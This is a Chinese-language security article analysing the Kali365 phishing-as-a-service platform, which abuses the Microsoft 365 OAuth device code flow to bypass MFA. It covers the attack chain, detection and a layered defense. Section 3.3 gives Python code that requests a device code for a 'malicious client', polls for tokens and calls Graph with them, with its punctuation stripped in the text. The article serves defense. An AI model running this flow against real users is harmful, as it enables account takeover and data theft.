摘要2026 年 5 月 FBI 发布预警新型钓鱼即服务平台 Kali365 通过滥用 Microsoft 365 OAuth 2.0 设备代码授权流程可在不窃取密码、不伪造登录页面的前提下绕过多因素认证获取长期有效访问令牌实现账户持久化控制。该平台依托 Telegram 渠道分发以订阅制降低攻击门槛配合 AI 钓鱼诱饵、自动化模板与实时监控面板使低技能攻击者可规模化实施精准攻击。本文以设备代码钓鱼核心链路为切入点解析 Kali365 的技术架构、攻击流程与商业化运营模式复现令牌劫持与权限获取过程并提供关键代码示例从身份治理、策略管控、日志监测、用户教育四个维度构建闭环防御体系为企业抵御 OAuth 授权滥用类钓鱼攻击提供可落地的技术方案与实践指引。反网络钓鱼技术专家芦笛指出设备代码钓鱼的本质是合法授权流程被恶意劫持传统反钓鱼机制已失效必须以协议层管控与令牌生命周期管理为核心构建纵深防御。关键词Kali365设备代码钓鱼OAuth 2.0Microsoft 365多因素认证绕过钓鱼即服务1 引言随着云办公普及Microsoft 365 成为政企核心生产力平台其身份认证体系安全直接关系数据资产与业务连续性。传统钓鱼以伪造登录页窃取密码与一次性验证码为主在强密码策略与 MFA 普及下效果下降。攻击者转向滥用合法协议与接口设备代码钓鱼成为绕过 MFA 的主流手段。2026 年 4 月出现的 Kali365 平台将设备代码钓鱼标准化、服务化、商业化形成完整黑产链条。FBI 于 5 月 21 日发布 I-052126-PSA 公告警示该平台可批量获取 OAuth 访问令牌与刷新令牌实现无密码、无 MFA 持久访问威胁远超传统钓鱼。现有研究多聚焦传统钓鱼检测与用户意识对 OAuth 授权滥用、令牌劫持类攻击覆盖不足缺乏针对 Kali365 的全链路分析与可复现验证。本文基于 FBI 预警与安全厂商情报系统拆解攻击机理给出代码示例与防御部署方案填补该领域研究缺口为企业防护提供理论与实践支撑。2 设备代码钓鱼与 Kali365 平台概述2.1 设备代码授权流程OAuth 2.0 Device Code FlowOAuth 2.0 设备代码流程RFC 8628面向无浏览器 / 输入能力的智能设备设计核心是用户通过辅助设备完成授权目标设备获取令牌访问资源。标准流程如下受限设备向授权服务器发起请求获取设备码、用户码、验证 URL 与有效期设备显示用户码与验证 URL引导用户在手机 / 电脑访问用户在官方页面登录、输入用户码并授权授权服务器校验通过向设备返回访问令牌与刷新令牌设备持令牌调用 API令牌过期用刷新令牌续期。该流程全程在官方域名完成无伪造页面用户信任度高成为攻击者突破口。2.2 Kali365 平台的核心特征与商业化模式Kali365 是 2026 年 4 月出现的专业化 PhaaS 平台依托 Telegram 分发采用订阅制月付 250 美元、年付 2000 美元降低攻击门槛。核心功能包括AI 生成多语言高仿真诱饵适配邮件、短信、企业通知场景自动化攻击模板支持批量投递与目标管理实时监控面板可视化展示授权状态与令牌捕获令牌存储与共享支持多攻击者复用延长危害周期。反网络钓鱼技术专家芦笛强调Kali365 标志钓鱼攻击从单兵作案转向工业化交付攻击成本下降、成功率上升传统边界防护与意识培训已无法应对。2.3 设备代码钓鱼与传统钓鱼的差异表格攻击维度 传统钓鱼 设备代码钓鱼Kali365核心目标 密码 MFA 验证码 OAuth 访问令牌 / 刷新令牌页面真实性 伪造域名 / 仿冒页面 官方域名与合法流程MFA 有效性 可绕过但易检测 完全绕过用户完成授权访问持久性 依赖密码有效性 长期有效重置密码无效检测难度 URL、页面特征可识别 无异常流量日志隐蔽技术门槛 需搭建钓鱼站点 依托平台低技能可执行差异表明设备代码钓鱼是合法流程的恶意劫持突破传统防御逻辑威胁等级显著提升。3 Kali365 攻击全链路与技术机理3.1 攻击完整流程诱饵投放攻击者通过 Kali365 生成诱饵冒充 IT、共享服务、法务等要求用户访问官方验证页输入设备码恶意码生成平台调用 Microsoft 身份中心接口注册恶意客户端获取设备码与用户码嵌入诱饵用户误授权用户在官方页面登录、输入代码、完成 MFA授权攻击者会话令牌劫持Kali365 轮询获取访问令牌与刷新令牌存入平台数据库持久化控制攻击者持令牌访问邮件、Teams、OneDrive窃取数据、创建规则、横向渗透。整个过程无恶意代码、无伪造页面安全设备难以告警。3.2 核心技术原理授权劫持与令牌窃取攻击核心是用户为攻击者会话完成合法授权。攻击者获取的是绑定自身会话的令牌而非用户凭证。即使用户改密令牌仍有效直至过期或吊销。与传统 MFA 钓鱼不同Kali365 不拦截验证码而是让用户在官方流程中完成授权系统判定为合法操作MFA 完全失效。3.3 攻击代码示例基于 Microsoft 身份中心接口以下为设备码请求、轮询令牌、令牌调用的关键代码仅用于防御研究。3.3.1 获取设备代码import requestsimport jsondef get_device_code():url https://login.microsoftonline.com/common/oauth2/v2.0/devicecodepayload {client_id: 14e01c47-1234-5678-abcd-0123456789ab, # 恶意客户端IDscope: https://graph.microsoft.com/.default offline_access}headers {Content-Type: application/x-www-form-urlencoded}response requests.post(url, datapayload, headersheaders)return json.loads(response.text)if __name__ __main__:device_code_info get_device_code()print(用户码, device_code_info[user_code])print(验证URL, device_code_info[verification_uri])print(设备码, device_code_info[device_code])3.3.2 轮询获取令牌python运行import timedef poll_for_token(device_code, client_id):url https://login.microsoftonline.com/common/oauth2/v2.0/tokenwhile True:payload {grant_type: urn:ietf:params:oauth:grant-type:device_code,client_id: client_id,device_code: device_code}response requests.post(url, datapayload)res json.loads(response.text)if access_token in res:return reselif res.get(error) ! authorization_pending:raise Exception(res.get(error_description))time.sleep(3)3.3.3 利用访问令牌调用 Graph APIdef get_user_profile(access_token):url https://graph.microsoft.com/v1.0/meheaders {Authorization: fBearer {access_token}}response requests.get(url, headersheaders)return json.loads(response.text)反网络钓鱼技术专家芦笛指出上述代码复现核心劫持逻辑企业可用于搭建检测环境验证防御策略有效性。3.4 攻击危害与后续行动链数据窃取批量下载邮件、文档、通讯录权限维持创建转发规则、禁用告警、添加恶意应用横向渗透窃取凭据、发动 BEC、部署勒索软件长期隐蔽刷新令牌长效数月不被发现。FBI 预警显示Kali365 已导致多起数据泄露与业务中断危害覆盖各行业。4 Kali365 攻击的检测与识别方法4.1 基于日志的异常检测重点监控 Microsoft Entra ID 登录日志高频设备代码登录请求境外 / 匿名 IP 发起设备码流程短时间内多用户授权同一客户端授权后大量邮件读取 / 转发。4.2 基于客户端 ID 与应用权限的管控建立白名单仅允许可信客户端 ID限制离线访问权限缩短刷新令牌有效期禁止高权限应用用户自主同意需管理员审批。4.3 基于流量与行为的分析监控向官方验证页的异常引导流量识别批量、模板化、含固定验证码的诱饵关联 Telegram 渠道与攻击 IP追踪基础设施。反网络钓鱼技术专家芦笛强调检测核心是授权行为异常而非页面伪造需聚焦设备码流程、客户端 ID、令牌属性。5 闭环防御体系构建5.1 协议层管控禁用 / 限制设备代码流最有效措施是通过条件访问策略阻断进入 Microsoft Entra ID 管理中心新建条件访问策略包含全用户 / 全应用云应用 / 操作 — 验证会话 — 设备代码流授权设置为 “阻止”。确有业务需求按最小权限原则仅限指定用户组 / 设备 / 可信 IP启用会话过期与强制重授权。5.2 身份层强化抗钓鱼 MFA 与最小权限部署 FIDO2 安全密钥 / 通行密钥抵御钓鱼攻击禁用短信 / 邮件验证码改用 Microsoft Authenticator实施最小权限定期权限评审。5.3 应用层治理应用同意与令牌管控启用用户同意限制仅允许可信应用定期审计已授权应用清理可疑项缩短刷新令牌有效期启用自动吊销。5.4 监测与响应SIEM 联动与快速处置配置告警规则异常设备码登录、批量同意、境外 IP 访问建立响应流程吊销令牌、重置密码、复查权限、溯源分析。5.5 用户教育精准识别与规范操作培训核心要点官方验证页仅用于智能设备非文档 / 邮件验证不输入外部提供的设备码先核实身份异常请求立即上报不随意授权。反网络钓鱼技术专家芦笛强调防御需技术、策略、人员协同形成从协议到意识的闭环才能有效抵御 Kali365 类攻击。6 防御效果验证与实践案例6.1 测试环境与验证方案搭建模拟环境部署防御策略开展攻击模拟启用条件访问阻止设备代码流启用应用同意管控配置告警规则模拟诱饵投放与授权。6.2 验证结果阻断策略100% 阻止恶意设备码登录应用管控拦截恶意客户端授权请求监测告警异常行为实时触发用户识别培训后识别率显著提升。6.3 企业实践案例某科技公司部署策略后拦截多起 Kali365 攻击无账户沦陷。实践证明闭环体系可有效抵御攻击。7 挑战与趋势展望7.1 当前挑战合法与恶意授权界限模糊检测困难云环境跨平台授权复杂统一管控难黑产持续迭代诱饵与规避手段升级。7.2 发展趋势PhaaS 更专业化AI 降低攻击门槛攻击向更多云平台与协议扩散防御转向零信任与智能分析。反网络钓鱼技术专家芦笛指出未来防御需以零信任为核心持续优化策略与监测保持对抗优势。8 结语Kali365 代表钓鱼攻击的工业化、协议化、隐蔽化趋势通过滥用 OAuth 设备代码流程绕过 MFA危害巨大。本文系统解析其攻击链路、技术原理与防御体系证明仅靠用户意识与传统设备不足防护必须从协议禁用、身份强化、应用管控、监测响应、用户教育构建闭环。随着云认证普及授权滥用将长期存在。企业需持续跟踪威胁动态优化策略平衡安全与体验提升整体抗攻击能力保障云办公环境安全。编辑芦笛公共互联网反网络钓鱼工作组